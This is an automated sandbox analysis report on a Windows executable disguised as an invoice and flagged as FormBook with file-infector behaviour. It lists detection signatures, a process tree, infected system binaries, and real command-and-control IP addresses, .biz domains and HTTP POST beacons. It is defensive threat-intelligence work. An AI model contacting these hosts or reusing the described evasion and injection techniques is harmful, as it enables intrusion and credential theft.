Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV_NE_02_2034388.exe

Overview

General Information

Sample name:INV_NE_02_2034388.exe
Analysis ID:1574347
MD5:c5843430a72fa7b29070c33f0f4d83d2
SHA1:a5c6c473fc57e7a8b26bb4acef0be2843aa56653
SHA256:77fff1c59aace50f9bbb9184b1086cccb57df0cb5d3b10589a9b6b91283aa719
Tags:exeuser-julianmckein
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • INV_NE_02_2034388.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\INV_NE_02_2034388.exe" MD5: C5843430A72FA7B29070C33F0F4D83D2)
    • svchost.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\INV_NE_02_2034388.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 7428 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 4768582FEC7E07C429C532098BB3A67A)
  • alg.exe (PID: 7548 cmdline: C:\Windows\System32\alg.exe MD5: B0C38B43BA0CC2CDF73E2C84A80101CF)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7852 cmdline: C:\Windows\system32\AppVClient.exe MD5: BAE30C5C71632F53795DE111E7ED6DC7)
  • FXSSVC.exe (PID: 7956 cmdline: C:\Windows\system32\fxssvc.exe MD5: CCD5F7B3E8C0B4733DD115FF88547F14)
  • elevation_service.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F48DDCBA6A247532AFB4E29CAAD7C016)
  • maintenanceservice.exe (PID: 8132 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 1B5C1CB5B173A3E9004CEBAB7FD31E75)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        17.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ParentImage: C:\Users\user\Desktop\INV_NE_02_2034388.exe, ParentProcessId: 7368, ParentProcessName: INV_NE_02_2034388.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ProcessId: 8112, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ParentImage: C:\Users\user\Desktop\INV_NE_02_2034388.exe, ParentProcessId: 7368, ParentProcessName: INV_NE_02_2034388.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ProcessId: 8112, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T08:58:02.451238+010020516491A Network Trojan was detected192.168.2.7647161.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T08:57:53.707129+010020516481A Network Trojan was detected192.168.2.7529451.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T08:57:47.143286+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749701TCP
          2024-12-13T08:57:53.777240+010020181411A Network Trojan was detected44.221.84.10580192.168.2.749711TCP
          2024-12-13T08:58:05.616265+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749738TCP
          2024-12-13T08:59:39.008398+010020181411A Network Trojan was detected47.129.31.21280192.168.2.749950TCP
          2024-12-13T08:59:41.942002+010020181411A Network Trojan was detected13.251.16.15080192.168.2.749960TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T08:57:47.143286+010020377711A Network Trojan was detected54.244.188.17780192.168.2.749701TCP
          2024-12-13T08:57:53.777240+010020377711A Network Trojan was detected44.221.84.10580192.168.2.749711TCP
          2024-12-13T08:58:05.616265+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749738TCP
          2024-12-13T08:59:39.008398+010020377711A Network Trojan was detected47.129.31.21280192.168.2.749950TCP
          2024-12-13T08:59:41.942002+010020377711A Network Trojan was detected13.251.16.15080192.168.2.749960TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T08:57:47.022692+010028508511Malware Command and Control Activity Detected192.168.2.74970154.244.188.17780TCP
          2024-12-13T08:58:50.913385+010028508511Malware Command and Control Activity Detected192.168.2.74979582.112.184.19780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: INV_NE_02_2034388.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://54.244.188.177/GAvira URL Cloud: Label: phishing
          Source: http://54.244.188.177/fAvira URL Cloud: Label: phishing
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\msdtc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\FXSSVC.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeAvira: detection malicious, Label: W32/Infector.Gen
          Multi AV Scanner detection for submitted file
          Source: INV_NE_02_2034388.exeReversingLabs: Detection: 81%
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\msdtc.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\FXSSVC.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: INV_NE_02_2034388.exeJoe Sandbox ML: detected
          Source: INV_NE_02_2034388.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1257051766.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationFontCache.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:52945 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49701 -> 54.244.188.177:80
          Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:64716 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49795 -> 82.112.184.197:80
          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
          Source: Joe Sandbox ViewIP Address: 18.141.10.107 18.141.10.107
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49738
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49738
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49701
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49701
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49711
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49711
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49950
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49950
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49960
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49960
          Source: global trafficHTTP traffic detected: POST /wtafuencqgdxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: global trafficHTTP traffic detected: POST /trlioiljoillllwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /amnlbtdctisruxvs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: global trafficHTTP traffic detected: POST /wibawwpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /mddjrljmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /btfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
          Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
          Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
          Source: unknownHTTP traffic detected: POST /wtafuencqgdxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/Oeh
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/amnlbtdctisruxvs
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/b
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/5
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/9N
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/G
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/f
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1313746685.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1343295812.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/wtafuenc
